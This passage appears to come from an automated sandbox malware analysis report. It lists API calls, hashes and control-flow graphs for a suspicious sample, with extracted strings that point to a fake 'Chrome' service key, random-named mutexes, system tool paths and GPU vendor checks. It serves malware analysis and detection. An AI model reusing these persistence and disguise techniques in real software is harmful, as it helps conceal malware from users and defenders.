                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DelayExecution
                                                                                                        • String ID:
                                                                                                        • API String ID: 1249177460-0
                                                                                                        • Opcode ID: a9efc844cea4936be805583ba1432efd4cb6cf176723f88e4930ad65a1e23134
                                                                                                        • Instruction ID: 55769af2d4bf97badd1df828a245d3095576d73c2821e0f357dacb6e1e8aabda
                                                                                                        • Opcode Fuzzy Hash: a9efc844cea4936be805583ba1432efd4cb6cf176723f88e4930ad65a1e23134
                                                                                                        • Instruction Fuzzy Hash: 6EF09DB6608B408AEA12DB62F85179A77A1F79D7C0F009919BBC853739DB38C190CB40
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
                                                                                                        • String ID: $ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\vxmklory$\BaseNamedObjects\wzaaradbbanhjyiuzqingyiz$\BaseNamedObjects\zvephrvenfzrpfqs$\Chrome.exe$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Services\Chrome$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe
                                                                                                        • API String ID: 3506639089-1164981747
                                                                                                        • Opcode ID: f9f00584740f326b0651aa11fe350e4e628a7d90e96a58d678bb832e4801c0d4
                                                                                                        • Instruction ID: b07b20a1427e0a2d1bb55387612dda4660aaab1b0858772cfc3d8ceca331e793
                                                                                                        • Opcode Fuzzy Hash: f9f00584740f326b0651aa11fe350e4e628a7d90e96a58d678bb832e4801c0d4
                                                                                                        • Instruction Fuzzy Hash: AC433AF1524AC198F323DF2AF8457E563A0BB9E3C8F445216FB84676B2EB794285C305

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 412 140002a76-140002ab8 call 140001503 call 140006510 memset 394->412 413 140002a6d 394->413 398 140002fa7-140002fe4 call 140001370 395->398 399 140002969-140002978 395->399 402 140002884-14000289b 396->402 403 1400028e8-1400028eb 396->403 400 14000284a-14000285e 397->400 404 1400029d4-140002a3e wcsncmp call 1400014e5 399->404 405 14000297a-1400029cd 399->405 400->389 400->391 408 1400028e5 402->408 409 14000289d-1400028b2 402->409 403->400 404->394 405->404 408->403 414 1400028c0-1400028c7 409->414 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415 1400028c9-1400028e3 414->415 416 1400028f0-1400028f9 414->416 415->408 415->414 416->400 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->398 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                                                        • String ID: 0$X$\BaseNamedObjects\zvephrvenfzrpfqs$`
                                                                                                        • API String ID: 780471329-1565225789
                                                                                                        • Opcode ID: d06ff198b9adf04d2293b3933f1008c9007d93146ac6b43991ebde6bbab559d8
                                                                                                        • Instruction ID: 288012cf14065c2f391846a3ab3d30113bdb4d4bb9c282988a20f83871f53ef7
                                                                                                        • Opcode Fuzzy Hash: d06ff198b9adf04d2293b3933f1008c9007d93146ac6b43991ebde6bbab559d8
                                                                                                        • Instruction Fuzzy Hash: EA126CB2618BC081E762CB26F8443EAB7A4F789794F418215EBA957BF5DF78C185C700

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2643109117-0
                                                                                                        • Opcode ID: baa7c4cbecdde1a77dbd54a449249007eed9c0f89ee8769e77dfeb6f93e6c214
                                                                                                        • Instruction ID: afe468c82ee21520ab5432c45d5df99f9e7bb2e51abf512e96f833b76cc36b7a
                                                                                                        • Opcode Fuzzy Hash: baa7c4cbecdde1a77dbd54a449249007eed9c0f89ee8769e77dfeb6f93e6c214
                                                                                                        • Instruction Fuzzy Hash: 375133B1601A4085FB17EF27F9943EA27A5BB8CBD0F409121FB4E877B2DE3884958700

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 509 140001cf4-140001cfe call 140001d40 503->509 510 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->510 504->505 507 140001c04 504->507 505->502 505->503 511 140001cd7-140001cf3 memcpy 507->511 514 140001d03-140001d1e call 140001d40 509->514 510->514 517 140001c72-140001c79 510->517 518 140001d23-140001d38 GetLastError call 140001d40 514->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->511 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                                                                        APIs
                                                                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DBC,0000000140007DBC,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DBC,0000000140007DBC,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007DBC,0000000140007DBC,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                        • API String ID: 2595394609-2123141913
                                                                                                        • Opcode ID: df7238d79fa2d2807d12a3721f02e952cb70ce12e34742303a71ae7989f1f348
                                                                                                        • Instruction ID: 3e7b5ecd0f9ab9c5b6f3dbc83d536faacc7d2f1bcfce1c54eb7915199dcf8083
                                                                                                        • Opcode Fuzzy Hash: df7238d79fa2d2807d12a3721f02e952cb70ce12e34742303a71ae7989f1f348
                                                                                                        • Instruction Fuzzy Hash: 444132B1201A4486FA66DF57F884BE927A0F78DBC4F558126EF0E877B1DA38C586C700

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 3326252324-0
                                                                                                        • Opcode ID: 672952b90304c9560e718319ab6be91a0d91d1b34b3c94dd1f916c2f21b526cc
                                                                                                        • Instruction ID: 8053d85934c412e1c454606f1f150af2342a590d3bb9918810e374f3e359275e
                                                                                                        • Opcode Fuzzy Hash: 672952b90304c9560e718319ab6be91a0d91d1b34b3c94dd1f916c2f21b526cc
                                                                                                        • Instruction Fuzzy Hash: 9A21F8B0305A0192FA6BDB53F9483E92360B76CBD0F448421EF1A47AB4DB79C98AC300

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006ad0 553->557 560 140001f43-140001f45 554->560 561 140001f2f-140001f3f 554->561 555->554 558 140001ee4-140001ee8 555->558 556->548 562 140001ec0 556->562 557->554 566 140001f0c-140001f10 557->566 563 140001eea-140001ef9 signal 558->563 564 140001f4e-140001f53 558->564 560->548 561->560 562->554 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CCG
                                                                                                        • API String ID: 0-1584390748
                                                                                                        • Opcode ID: 38169c844ed26cb13454801cef406e8a94d00939990f7d78723699de957bd425
                                                                                                        • Instruction ID: 4d6f217dfeb6d9e17f7c3982d90ffc55239669622623fea9138ee2928b50566b
                                                                                                        • Opcode Fuzzy Hash: 38169c844ed26cb13454801cef406e8a94d00939990f7d78723699de957bd425
                                                                                                        • Instruction Fuzzy Hash: A3214CB1B0161542FA77DA2BF5903FA1192ABCD7E4F258535FF1A473F5DE3888828241

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 584 140001a20-140001a26 580->584 585 140001956-140001961 581->585 586 14000199e-1400019a6 581->586 582->581 583 14000192b-14000193a 582->583 583->579 589 140001b87-140001b98 call 140001d40 584->589 590 140001a2c-140001a37 584->590 587 140001970-14000199c call 140001ba0 585->587 586->572 588 1400019a8-1400019c1 586->588 587->586 594 1400019df-1400019e7 588->594 590->586 591 140001a3d-140001a5f 590->591 595 140001a7d-140001a97 591->595 596 1400019e9-140001a0d VirtualProtect 594->596 597 1400019d0-1400019dd 594->597 600 140001b74-140001b82 call 140001d40 595->600 601 140001a9d-140001afa 595->601 596->597 597->572 597->594 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->595 613->609 614->600
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                        • API String ID: 544645111-395989641
                                                                                                        • Opcode ID: 549065ebbaaacac7af01a02dac067995769743cefac2621fb67829ca21da6e66
                                                                                                        • Instruction ID: 7b158fb3713a3061293f9ea4dfc1a1b5cc6f81aa9114ce7ea307f59c52e97846
                                                                                                        • Opcode Fuzzy Hash: 549065ebbaaacac7af01a02dac067995769743cefac2621fb67829ca21da6e66
                                                                                                        • Instruction Fuzzy Hash: D15115B6B11544DAEB12CF67F841BD82761A759BE8F548211FB1D077B4DB38C586C700

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: fprintf
                                                                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                        • API String ID: 383729395-3474627141
                                                                                                        • Opcode ID: 5a4655e5f7d9bc7fa14c795a7f63c94cd929b5219b64bcdb3273f472a942e7dc
                                                                                                        • Instruction ID: 16811f742f11ff20b59475e39225b65b732edfb60784bdb26f76ef83c73ed472
                                                                                                        • Opcode Fuzzy Hash: 5a4655e5f7d9bc7fa14c795a7f63c94cd929b5219b64bcdb3273f472a942e7dc
                                                                                                        • Instruction Fuzzy Hash: 25F09671A14A4482E612EF6AB9417ED6361E75D7C1F50D211FF4E676A1DF3CD182C310

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                        • Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_47_2_140000000_conhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 682475483-0
                                                                                                        • Opcode ID: d9f1a7fb7d620c15ffea2ce02aacef8734a5e410c6aecfc4b1b8398fb1dfb3d8
                                                                                                        • Instruction ID: 2f34ca9de4f01c93604b96efa8ab876b374c4069194b8a7974a56712bffd5862
                                                                                                        • Opcode Fuzzy Hash: d9f1a7fb7d620c15ffea2ce02aacef8734a5e410c6aecfc4b1b8398fb1dfb3d8
                                                                                                        • Instruction Fuzzy Hash: 1101B6B5705A0192FA67DB53FD083D86360B76CBD1F458421EF1A53AB4DB75C99AC300